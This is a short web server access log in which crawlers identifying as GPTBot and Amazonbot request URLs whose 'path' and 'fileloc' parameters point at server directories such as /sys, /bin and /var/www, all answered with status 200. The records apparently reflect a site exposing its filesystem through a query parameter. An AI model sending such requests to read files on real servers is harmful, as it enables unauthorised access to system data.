74.7.227.189 - - [09/Nov/2025:00:51:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/memory7/subsystem/devices/memory5/subsystem/devices/memory3 HTTP/1.0" 200 3665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.212.145.46 - - [09/Nov/2025:00:51:18 +0000] "GET /our-works/tvc-sjc/?fileloc=//bin/mk_modmap&path=//bin HTTP/1.0" 200 6299 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:51:18 +0000] "GET /92jhuf882.html?path=/var/www HTTP/1.0" 200 3947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
